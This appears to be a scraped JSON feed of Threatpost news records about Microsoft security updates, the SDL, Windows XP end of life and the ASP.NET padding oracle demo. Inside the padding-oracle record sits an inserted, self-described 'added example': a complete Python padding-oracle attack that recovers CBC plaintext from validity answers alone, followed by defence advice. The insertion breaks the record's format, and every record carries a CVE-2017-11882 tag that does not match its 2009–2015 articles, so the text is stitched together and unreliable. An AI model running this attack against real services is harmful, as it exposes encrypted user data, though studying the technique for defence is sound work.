\n\nASLR and DEP, which serve as defense-in-depth roadblocks during malware attacks, are enabled by default in newer versions of Windows.\n", "cvss3": {}, "published": "2010-07-28T18:54:55", "type": "threatpost", "title": "Microsoft Ships Anti-Exploit Tool for IT Admins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:19:37", "id": "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "href": "https://threatpost.com/microsoft-ships-anti-exploit-tool-it-admins-072810/74268/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:49", "description": "[From Washington Post (Brian Krebs)](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>)\n\n[](<https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/>)Microsoft may soon be taking the unusual step of issuing an out-of-band security update to address multiple weaknesses that stem from a Windows security flaw that the software giant tried to fix earlier this month. 
[Read the full story](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>) [washingtonpost.com] See more details [at Halvar Flake\u2019s blog](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>) [blogspot.com]\n", "cvss3": {}, "published": "2009-07-24T14:02:10", "type": "threatpost", "title": "Microsoft Scrambling to Close Stubborn Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:56", "id": "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "href": "https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/72881/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "description": "In this video, researchers Juliano Rizzo and Thai Duong demonstrate the technique they developed for stealing cryptographic keys for ASP.NET Web applications, enabling them to compromise virtually any app built on ASP.NET. 
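
The padding oracle Rizzo and Duong exploited is a generic CBC weakness, and the following added example (not their code, and not the ASP.NET-specific attack from the video) shows the primitive on a constructed toy service: a `Server` that encrypts a token under a key the attacker never learns, but whose decrypt path reports whether the PKCS#7 padding was valid; the attacker then decrypts the token byte by byte using only that yes/no answer. The block cipher is a stand-in Feistel construction built on SHA-256 so the script needs only the standard library, and `Server`, `padding_is_valid` and the token contents are assumptions of the example, not anything from the original demo.

```python
import hashlib
import os

BLOCK = 16


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


# Stand-in block cipher: an 8-round Feistel network over 16-byte blocks with a
# SHA-256 round function, so the example runs on the standard library alone.
# The attack below never looks inside the cipher; swap in AES and it is unchanged.
def _round(key, i, half):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def encrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in range(8):
        l, r = r, xor(l, _round(key, i, r))
    return r + l


def decrypt_block(key, block):
    r, l = block[:8], block[8:]  # undo the final swap
    for i in reversed(range(8)):
        l, r = xor(r, _round(key, i, l)), l
    return l + r


def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = encrypt_block(key, xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out += xor(decrypt_block(key, blk), prev)
        prev = blk
    return out


class Server:
    """Hypothetical app that issues encrypted tokens and, on decrypt, leaks
    whether the padding was valid (the padding oracle). The key never leaves it."""

    def __init__(self):
        self.key = os.urandom(32)

    def issue_token(self, plaintext):
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pad(plaintext))

    def padding_is_valid(self, token):
        try:
            unpad(cbc_decrypt(self.key, token[:BLOCK], token[BLOCK:]))
            return True
        except ValueError:
            return False  # a distinguishable failure is all the attacker needs


def padding_oracle_attack(oracle, token):
    """Recover the plaintext of an IV-prefixed CBC token using only the oracle."""
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    plaintext = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # decrypt_block(key, target), learned byte by byte
        for pos in range(BLOCK - 1, -1, -1):
            padv = BLOCK - pos  # padding value we force the tail to decrypt to
            for guess in range(256):
                forged = bytearray(BLOCK)
                forged[pos] = guess
                for j in range(pos + 1, BLOCK):
                    forged[j] = inter[j] ^ padv
                if not oracle(bytes(forged) + target):
                    continue
                if pos == BLOCK - 1:
                    # Rule out a chance hit on a longer valid padding (e.g. 02 02):
                    # flipping the byte before must not matter for a genuine 01.
                    forged[pos - 1] ^= 0xFF
                    if not oracle(bytes(forged) + target):
                        continue
                inter[pos] = guess ^ padv
                break
        plaintext += xor(bytes(inter), prev)
    return unpad(plaintext)


def demo(secret=b"user=alice;role=admin"):
    server = Server()
    token = server.issue_token(secret)  # constructed sample token
    return padding_oracle_attack(server.padding_is_valid, token)
```

`demo()` returns the token's plaintext without ever touching `server.key`, at a cost of at most 256 oracle queries per byte. The defence is to make the oracle go away: authenticate the ciphertext (an HMAC verified before any decryption, or an AEAD mode) and return one uniform error for every failure, so that valid and invalid padding are indistinguishable from the outside.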
\n\nYou can read the full story of their attack in this article, \u201c[Padding Oracle Attack Affects Millions of ASP.NET Apps](<https://threatpost.com/demo-aspnet-padding-oracle-attack-091710/>).\u201d\n", "cvss3": {}, "published": "2010-09-17T17:48:52", "type": "threatpost", "title": "Demo of ASP.NET Padding Oracle Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:02", "id": "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "href": "https://threatpost.com/demo-aspnet-padding-oracle-attack-091710/74485/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:15", "description": "[](<https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/>)WASHINGTON\u2013Microsoft has spent several years and untold millions of dollars working on methods to write more secure and reliable software, and now the company is encouraging other organizations to make the same investment in software security.\n\nOne of the outputs of the company\u2019s software security efforts is its much-heralded Security Development Lifecycle (SDLC), a framework for developing methods for writing secure code. However, as Microsoft has acknowledged and other experts have pointed out, the SDLC was developed specifically for Microsoft\u2019s own internal processes and is not a one-size-fits-all methodology. But companies that are interested in using the lessons that Microsoft has learned throughout the process can use the SDLC as a starting point for their own efforts, Jim Molini, a senior program manager at Microsoft said in a talk at the OWASP AppSec DC conference here Thursday.\n\n\u201cIf you build software, you have to focus on how you build it, because it\u2019s becoming a higher priority attack vector right now,\u201d he said. 
\u201cThey\u2019re finding new ways to attack us and we have to find ways to buttress our software against these attacks.\u201d\n\nMolini said that a software security program has to be a comprehensive effort that includes everyone involved in the development process and must start with a fundamental change in the way that software is written. \n\n\u201cYou have to eliminate the separation of security in the development organization,\u201d he said. \u201cIt\u2019s really going to take people working together to fix this.\u201d\n\nMolini also emphasized that just having a whole bunch of other developers or testers look at the code is not enough.\n\n\u201cMany eyeballs don\u2019t solve the security problem. It\u2019s more than just being able to write code,\u201d Molini said. \u201cIt\u2019s fixing the process aspects and the software development processes in order to reduce the number of vulnerabilities you introduce. You can\u2019t just say zero-defect code is secure. You have to prioritize security as a development goal.\u201d\n\nSoftware security experts often say that when they show developers ways that their applications can be broken or abused, the developers protest that no user would ever do the things that broke the application. Users may not, but attackers most certainly will. To help eliminate this mentality, Molini said developers need to think like attackers and not users.\n\n\u201cYou need to develop abuse cases, not just use cases, so that the test team can develop tests for them,\u201d he said. 
\u201cThat will make your software much more secure in the long run.\u201d\n", "cvss3": {}, "published": "2009-11-12T19:08:15", "type": "threatpost", "title": "Microsoft Pushes for Better Software Security Practices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:11:49", "id": "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "href": "https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/73089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:39", "description": "[](<https://threatpost.com/microsoft-tries-boost-sdl-adoption-020210/>)Microsoft is trying to boost adoption of the software security practices in its Security Development Lifecycle by releasing a revised set of instructions to make implementation of the process easier and faster. \n\nAt the Black Hat DC conference on Tuesday, the company announced the release of its [\u201cSimplified Implementation of the Microsoft SDL\u201d](<http://www.microsoft.com/downloads/details.aspx?FamilyID=0baff8e8-ab17-4e82-a1ff-7bf8d709d9fb&displaylang=en>) paper, as well as a template designed to help developers integrate Microsoft\u2019s SDL, along with the Agile Software Development process, into Visual Studio. That template will enable developers to automatically check all of their code developed in Visual Studio against the SDL framework. \n\nMicrosoft has been pushing the need for more secure software development practices for several years, but some organizations have said that the company\u2019s SDL model is too difficult and expensive to implement, and doesn\u2019t fit into their organization\u2019s development structure. So the company is releasing the simplified description of the SDL implementation process in an effort to get more developers on board.\n\n\u201cThe process outlined in this paper sets a minimum threshold for SDL compliance. 
That said, organizations aren\u2019t uniform \u2013 development teams should apply the SDL in a way that is suitable to the human talent and resources available, but doesn\u2019t compromise organizational security goals,\u201d the company said in the SDL paper.\n\nThe paper defines various roles for people involved in the SDL process, and lays out required and optional SDL activities, as well as a five-phase process from requirements through release.\n", "cvss3": {}, "published": "2010-02-02T15:39:41", "type": "threatpost", "title": "Microsoft Tries to Boost SDL Adoption", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:34:21", "id": "THREATPOST:7E30033E60118E5B4B8C14689A890155", "href": "https://threatpost.com/microsoft-tries-boost-sdl-adoption-020210/73469/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:13", "description": "Problems with [a security update issued this week by Microsoft](<https://threatpost.com/microsoft-patches-old-stuxnet-bug-freak-vulnerability/111565>) have surfaced on a number of technology forums.\n\nWindows users say [Microsoft Security Advisory 3033929](<https://technet.microsoft.com/en-us/library/security/3033929.aspx>), which adds SHA-2 code-signing and verification support for Windows 7 client machines and Windows Server 2008 R2 boxes, is causing computers to enter an infinite install-and-reboot loop.\n\nA request for comment from Microsoft was not returned in time for publication. 
It is not clear whether or when Microsoft will pull the update back for repairs as it has with other [faulty](<https://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>) [patches](<https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>).\n\n\u201cAfter installation the PC reboots, but during the boot up configuration of the patch it fails and Windows starts, reverting the configuration and reboots,\u201d said one poster on a Microsoft-sponsored [Windows forum](<http://answers.microsoft.com/en-us/windows/forum/windows_7-windows_update/kb3033929-fails-to-install-and-cause-a-minor/4c56d5d5-a66c-4865-8ccb-d36f7c314c33>). \u201cAnd then it starts all over again a couple of times until it eventually boot into Windows.\u201d\n\nNine others on that one forum posted a reply noting the same problem almost verbatim.\n\nTuesday\u2019s update notes that it supersedes another similar update from October and addressed issues that customers had with that installation, Microsoft said. Windows 8, 8.1, RT, RT 8.1, Windows Server 2012 and Windows Server 2012 R2 already have SHA-2 support built in. Windows Server 2003, Vista and Windows Server 2008 will not receive similar support, Microsoft said.\n\nThe SHA-1 algorithm has long been considered weak, obsolete and dangerous to deploy with [collision attacks against it considered practical by 2018](<threatpost.com/sha-1-hash-collision-could-be-within-reach-attackers-2018-100512/77088>). Microsoft, itself, formally recommended that [developers stop using SHA-1](<https://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) two years ago, and deprecate other weak crypto such as RC4. By January, Microsoft developers will no longer be allowed to use SHA-1 in code signing or developer certs.\n\nBrowser makers such as Mozilla and Google have also shunned the use of SHA-1. 
Mozilla, last September, [formally asked Certificate Authorities and websites to upgrade certificates to SHA-256, SHA-384 or SHA-512](<https://threatpost.com/mozilla-latest-to-part-ways-with-sha-1/108495>), all members of the SHA-2 family and considerably stronger than SHA-1, and announced that SHA-1 should not be trusted after Jan. 1, 2017.\n\nGoogle, meanwhile, [phased out SHA-1 usage in its Chrome](<https://threatpost.com/google-sunsetting-weak-sha-1-crypto-algorithm/108145>) browser starting last November with Chrome 40. Since then, Chrome no longer fully trusts sites whose certificate chains include SHA-1 and extend beyond Jan. 1, 2017. Sites with SHA-1 certificates extending beyond that date will be trusted, but Chrome will note that they have \u201cminor errors.\u201d Starting with Chrome 40, sites with certificate chains including SHA-1 that extend beyond Jan. 1, 2017 will be marked with a blank white sheet, the current visual display for \u201cneutral, lacking security.\u201d Chrome 41 will treat such sites as \u201caffirmatively insecure,\u201d a state indicated by a padlock with a red X on top of it and a red strike through the text that says HTTPS.\n", "cvss3": {}, "published": "2015-03-12T10:16:57", "type": "threatpost", "title": "Microsoft SHA-2 Advisory Causing 'Infinite Loop' Issues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-12T14:16:57", "id": "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "href": "https://threatpost.com/microsoft-sha-2-advisory-causing-infinite-loop-issues/111597/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "In a move that has surprised many in the security community, Microsoft has disbanded its Trustworthy Computing unit, the group that was responsible for the pioneering work that helped reverse the company\u2019s security reputation and make Windows a much more secure and reliable 
computing platform.\n\nThe end of the TwC group comes as Microsoft is in the middle of a major shift. The company on Thursday announced it was laying off 2,100 employees and also that it was closing its research facility in Silicon Valley. Under the changes in the security group at Microsoft, some of the TwC employees will be reassigned to the Cloud and Enterprise division and others will wind up in the legal group. The move presumably is an effort to integrate the security and privacy expertise in the TwC group into the rest of the company.\n\nThe break-up of the TwC group marks the end of an era at Microsoft, an era that began with the [memo that Bill Gates sent](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089>) to company employees in January 2002. Microsoft had been under fire from some of its larger customers\u2013government agencies, financial companies and others\u2013about the security problems in Windows, issues that were being brought front and center by a series of self-replicating worms and embarrassing attacks. Gates realized that the company was in danger of losing a large chunk of business if it didn\u2019t start making some changes regarding security, so he made the development of more secure products and platforms a top priority for all of Microsoft.\n\nThat began with putting developers through security training and also included stopping production on a major update to Windows in order to get the security of it right. It continued with Microsoft hiring security researchers, privacy experts and top software security people and eventually led to the creation of the Trustworthy Computing group. Gates\u2019s memo contemplated many of the changes that would come to computing, as well as the threats that would emerge.\n\n\u201cIn the past, we\u2019ve made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. 
We\u2019ve done a terrific job at that, but all those great features won\u2019t matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security. Our products should emphasize security right out of the box, and we must constantly refine and improve that security as threats evolve. A good example of this is the changes we made in Outlook to avoid email borne viruses. If we discover a risk that a feature could compromise someone\u2019s privacy, that problem gets solved first. If there is any way we can better protect important data and minimize downtime, we should focus on this. These principles should apply at every stage of the development cycle of every kind of software we create, from operating systems and desktop applications to global Web services,\u201d he wrote in the [memo](<http://www.computerbytesman.com/security/billsmemo.htm>).\n\n\u201cGoing forward, we must develop technologies and policies that help businesses better manage ever larger networks of PCs, servers and other intelligent devices, knowing that their critical business systems are safe from harm. Systems will have to become self-managing and inherently resilient. We need to prepare now for the kind of software that will make this happen, and we must be the kind of company that people can rely on to deliver it.\u201d\n\nOver the years, the TwC group accomplished much of that, and more. Breaking the group up may disperse into the rest of the company the expertise that\u2019s been concentrated in TwC, enabling the security experts to work more closely with the engineering teams and other groups inside the company. Or it may lead to an exodus of talent from Redmond. Either way, it signals a turning point for Microsoft and its decade-long effort to make security a priority. Computing has evolved dramatically in that time, as have Microsoft\u2019s product offerings, priorities and challenges. 
Microsoft\u2019s decision to eliminate the TwC group is just another indication of those changing times.\n", "cvss3": {}, "published": "2014-09-19T11:43:52", "type": "threatpost", "title": "Era Ends With Break Up of Trustworthy Computing Group at Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:58:40", "id": "THREATPOST:90355E85731E1618F6C63A58CD426966", "href": "https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Windows XP security support ends Tuesday and until now, most of the public hand-wringing over XP\u2019s end-of-life has been about the potential for malware outbreaks against unpatched vulnerabilities that have been [stockpiled by hackers](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) anxiously awaiting April 8, 2014.\n\nBut what about vulnerabilities in XP that have been responsibly shared with Microsoft and won\u2019t be fixed? Those too are perpetual zero-days after Tuesday.\n\nMicrosoft has made huge strides in developing trusted relationships with security researchers who are actively submitting bugs to Microsoft across its product lines. For Microsoft\u2019s part, it has done outreach to researchers, clarified disclosure policies and processes and established [bounty programs for bypasses of innate Windows mitigations](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>).\n\nAnd Microsoft isn\u2019t to be faulted for its business decision made long ago to end extended support for XP that includes security patches. Yet the fact remains whatever XP systems remain in circulation after tomorrow will be exposed and that brings up questions, such as: How will white or gray hats respond? 
For example, will there be a firestorm of public disclosures in the coming weeks?\n\n\u201cI know a subset of people who have disclosed stuff [in XP] to Microsoft that has not been patched, and that\u2019s given what I know. I\u2019m sure there\u2019s more I don\u2019t know of,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cI wouldn\u2019t encourage researchers to publicly disclose their research because they think that might make Microsoft issue a patch, because that\u2019s not going to happen. The only result is that it would increase the exposure for people at large.\n\n\u201cIt\u2019s a muddy bit of water,\u201d Barrett said. \u201cMicrosoft has been good about dealing with researchers who have been doing the right thing by following responsible disclosure procedures, but now they\u2019re not seeing action.\u201d\n\nMicrosoft did not respond to a request for comment in time for publication.\n\nHP\u2019s Zero Day Initiative, which buys vulnerabilities and exploits from researchers and shares them first with customers and then the affected vendor, has [203 advisories pending public disclosure](<http://www.zerodayinitiative.com/advisories/upcoming/>) listed on its website, 54 of which are Microsoft vulnerabilities going back a year. The website doesn\u2019t list the specific Microsoft product affected, but Microsoft has more than any other major vendor on the list.\n\n\u201cI\u2019m sure there\u2019s tons of stuff still out there; some of it is design flaw stuff that Microsoft can\u2019t fix or never got around to it,\u201d Barrett said. \u201cI\u2019m sure there\u2019s a backlog of stuff, but the clock has run out on XP.\u201d\n\nMicrosoft has already announced its final XP patch, a fix for a zero-day in Word that will be available Tuesday (Office 2003 support also ends Tuesday). 
The fear among some experts is that hackers will look at Microsoft security bulletins for vulnerabilities in supported products and trace those back to their potential exploitability in XP.\n\n\u201cAbsolutely hackers do that,\u201d Barrett said. \u201cIf you\u2019ve got a vulnerability in this file, they\u2019ll track it back to a particular DLL and see that it\u2019s been part of the OS since 2002 and not updated since 2004, they\u2019ll know it\u2019s vulnerable.\n\n\u201cYou might see a golden age of XP vulnerabilities for the next four to six months when adoption of XP is still relatively high and countermeasures are no longer in place. Then you\u2019ll start to see it fade as it\u2019s less used.\u201d\n\nQualys CTO Wolfgang Kandek has been tracking XP use in certain industries through the company\u2019s vulnerability scanner. Financial institutions still have the highest use of XP at 21 percent, followed by transportation at 14 percent (though this has dropped from 55 percent 12 months ago). Retail, another industry run ragged by hackers, is also at 14 percent. Support for Windows XP Embedded, which runs inside a number of consumer and commercial devices in these industries, does not run out until Jan. 12, 2016.\n\n\u201cThis is an additional weakness for these (retail) systems,\u201d Kandek said. \u201cThere are already problems with remote management, default passwords that work everywhere, a bunch of things that were done to make management easier that were not configured well. This just adds to it.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. Attackers can use that knowledge as a pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. 
I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n", "cvss3": {}, "published": "2014-04-08T06:03:54", "type": "threatpost", "title": "Unpatched Bugs, Windows XP End of Life and Public Disclosure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-08T00:08:09", "id": "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "href": "https://threatpost.com/the-muddy-waters-of-xp-end-of-life-and-public-disclosures/105295/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:09", "description": "Microsoft announced today that it will be shipping three critical and five important bulletins in the May edition of Patch Tuesday.\n\nAll of the \u2018critical\u2019 bulletins and two of the \u2018important\u2019 bulletins fix vulnerabilities that could otherwise lead to remote code execution. The two remaining \u2018important\u2019 bulletins could lead to an elevation of privilege if unpatched.\n\nThe affected software includes Microsoft Office, Windows, .NET Framework, and Silverlight. 
The bugs fixed this month affect all of the current versions of Windows.\n\nThe official bulletins will be released on [the TechNet Blog](<http://technet.microsoft.com/en-us/security/bulletin/ms12-may>) Tuesday, May 8, and Microsoft will host a webcast to discuss the fixes the following day, May 9, at 11 AM PST.\n", "cvss3": {}, "published": "2012-05-03T18:28:56", "type": "threatpost", "title": "Patch Tuesday Advance Notification: May Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:35", "id": "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "href": "https://threatpost.com/patch-tuesday-advance-notification-may-edition-050312/76522/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:42", "description": "Microsoft has released an open-source Web Protection Library (WPL) to help developers protect web sites from cross-site scripting attacks.\n\nThe WPL, which is a set of .NET assemblies, is being offered as part of a defense in depth strategy to add an extra layer to any validation or secure coding practices.\n\nIt essentially provides a list of encoding functions for user input, including HTML, HTML attributes, XML, CSS and JavaScript.\n\n * **White Lists:** AntiXSS differs from the standard .NET framework encoding by using a white list approach. All characters not on the white list will be encoded using the correct rules for the encoding type. Whilst this comes at a performance cost, AntiXSS has been written with performance in mind.\n * **Secure Globalization:** The web is a global market place, and cross-site scripting is a global issue. 
An attack can be coded anywhere, and Anti-XSS now protects against XSS attacks coded in dozens of languages.\n * **Security Runtime Engine**: The Security Runtime Engine (SRE) provides a wrapper around your existing web sites, ensuring that common attack vectors do not make it to your application. Protection is provided as standard for Cross Site Scripting and SQL Injection.\n\nDocumentation and download instructions [can be found at the open-source Codeplex](<http://wpl.codeplex.com/releases/view/20333>) site.\n", "cvss3": {}, "published": "2010-06-02T16:37:20", "type": "threatpost", "title": "Microsoft Releases Anti-XSS Web Protection Library", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:52", "id": "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "href": "https://threatpost.com/microsoft-releases-anti-xss-web-protection-library-060210/74047/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:47", "description": "Microsoft today announced plans to share pre-patch details on software vulnerabilities with governments around the world under a new program aimed at securing critical infrastructure and government assets from hacker attacks.\n\nThe program, codenamed Omega, features a Defensive Information Sharing Program (DISP) that will offer government entities at the national level technical information on vulnerabilities that are being updated in its products.\n\nMicrosoft\u2019s Steve Adegbite [explains](<http://blogs.technet.com/ecostrat/archive/2010/05/17/strengthening-the-security-cooperation-program.aspx>):\n\n_We will provide this information after our investigative and remediation cycle is completed to ensure that DISP members are receiving the most current information. 
While this process varies from issue to issue due to the complex nature of vulnerabilities, disclosure will happen just prior to our security update release cycles._\n\nThe company also announced a second information sharing program called the Critical Infrastructure Partner Program (CIPP) that aims to \u201cprovide valuable insights on security policy, including strategies, approaches to help aid the protection efforts for critical infrastructures,\u201d according to Adegbite.\n", "cvss3": {}, "published": "2010-05-18T19:01:18", "type": "threatpost", "title": "Microsoft to Share Vulnerability Details with Governments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:45:12", "id": "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "href": "https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/73986/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "Trojan downloaders and malware that masquerades as security software are the two fastest-growing threats on the Web right now, according to an analysis by Microsoft\u2019s Malware Protection Center. In its latest [Software Intelligence Report](<http://www.microsoft.com/downloads/details.aspx?FamilyID=aa6e0660-dc24-4930-affd-e33572ccb91f&displaylang=en>), released on Wednesday, the MMPC found that a Trojan downloader named Renos that installs rogue security software was the most prevalent threat in the second half of 2008, increasing by 66 percent.\n\nTrojan downloaders in general have become a major problem as attackers continue to look for new ways to install malware on vulnerable machines. 
Microsoft found that these threats accounted for more than half of all of the malware removed by its Malicious Software Removal Tool from July through December of last year.\n\n\u201cThe prevalence of rogue security software has increased significantly over the past three periods. Rogue security software uses fear and annoyance tactics to convince victims to pay for \u2018full versions\u2019 of the software in order to remove and protect themselves from malware, to stop the continual alerts and warnings, or both,\u201d the report says.\n\n\n\nMicrosoft pulls the data for the SIR from the results it sees from removals of malware done by the MSRT on millions of PCs, both in the enterprise and in homes. So it\u2019s an interesting data set with a fairly broad sample base.\n\nOne other interesting nugget in the report is that only about 41 percent of browser-based exploits on pre-Vista versions of Windows targeted Microsoft products. On Vista, that number drops to about five percent. And both of those numbers have been going down over time. 
That\u2019s a trend that bears watching.\n\n_*Graph from Microsoft Security Intelligence Report_\n", "cvss3": {}, "published": "2009-04-08T14:14:09", "type": "threatpost", "title": "Microsoft: Rogue security software fastest-growing online threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "href": "https://threatpost.com/microsoft-rogue-security-software-fastest-growing-online-threat-040809/72530/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:03", "description": "Microsoft plans to issue seven security bulletins in the [January Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release next week, fixing six vulnerabilities rated important and one rated critical. The bugs affect a variety of products, including Windows XP, Vista, Windows 7, Server 2003 and 2008 and Microsoft Developer Tools and Software.\n\nJust three of the seven bulletins Microsoft will issue on Jan. 10 will fix a vulnerability that could lead to remote code execution. The others can either lead to elevation of privilege or information disclosure. However, there is one bulletin that Microsoft has said can also lead to \u201csecurity feature bypass,\u201d something that isn\u2019t typically seen on the company\u2019s security bulletins.\n\n\u201cIn addition, eagle-eyed readers of the summary page will notice an unusual vulnerability classification, \u2018Security Feature Bypass,\u2019 for one of our Important-severity bulletins. SFB-class issues in themselves can\u2019t be leveraged by an attacker; rather, a would-be attacker would use them to facilitate use of another exploit. 
For those interested in learning more, we expect the SRD blog to publish a detailed analysis of the matter on Tuesday,\u201d Microsoft\u2019s Angela Gunn wrote in a blog post.\n\nThe company will release full information on the patches and which vulnerabilities they apply to on Tuesday.\n", "cvss3": {}, "published": "2012-01-06T15:08:03", "type": "threatpost", "title": "Microsoft to Issue Seven Bulletins, One Critical, on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "href": "https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/76067/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:33", "description": "Computer users are taking steps to mitigate online security threats, but still only score a paltry 34 out of 100 \u2013 a solid \u201cF\u201d \u2013 according to a new study by Microsoft. \n\nThe study, sponsored by [Microsoft\u2019s Trustworthy Computing Group](<http://www.microsoft.com/about/twc/en/us/default.aspx>) (TwC), introduces a new metric, the [Microsoft Computing Safety Index](<http://www.microsoft.com/security/resources/mcsi.aspx>) (MCSI) to measure online safety, but finds that consumers are having trouble getting past the basics when it comes to staying safe on the Internet.\n\nThe MCSI assigns a point value to a series of steps (more than 20 in all) that consumers can take to protect themselves online. Each point in turn is assigned to a tier of activity: Foundational (30 points), Technical (40 points) and Behavioral (30 points).\n\nActions like keeping strong passwords and choosing reputable Web sites fall under the Behavioral tier. Using a firewall, maintaining 